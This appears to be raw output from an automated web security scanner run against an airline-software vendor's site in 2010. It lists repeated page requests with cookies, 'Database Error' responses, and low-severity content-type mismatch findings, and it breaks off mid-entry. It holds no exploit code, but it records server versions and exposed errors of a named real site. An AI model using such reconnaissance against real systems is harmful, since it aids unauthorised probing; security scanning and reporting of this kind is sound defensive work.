GET /home/products_services/product/sabresonic_web HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322886; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_manager%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airport_data_intelligence%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/web_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322903; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product_index/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322214; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:27:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/sabre_airvision_fares_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fares_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322575; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:21:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/sabre_airvision_network_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:16:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/sabre_airvision_profit_essentials HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_essentials/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:16:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/sabre_airvision_profit_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:16:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/sabre_airvision_schedule_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_schedule_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:20:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/sabre_airvision_slot_manager_iata HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_slot_manager_iata/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:20:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/sabre_reaccommodation_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322305; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:02:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.
Request
GET /favicon.ico HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Tue, 05 Oct 2010 16:12:30 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 10 Feb 2010 20:56:40 GMT ETag: "36c009-37e-455c7200" Accept-Ranges: bytes Content-Length: 894 Connection: close Content-Type: text/plain
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Tue, 05 Oct 2010 18:33:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/complete_the_picture/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/copyright_and_trademark/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/executive_team/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/executive_team/darren_rickey HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321283; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:25:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/executive_team/ellen_ehrlich HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321293; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:28:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/executive_team/gordon_locke HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321289; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fproducts_services%2Fenterprise_operations%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:26:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/executive_team/ilia_kostov HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321274; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:25:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/executive_team/mark_silagy HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321271; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:23:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
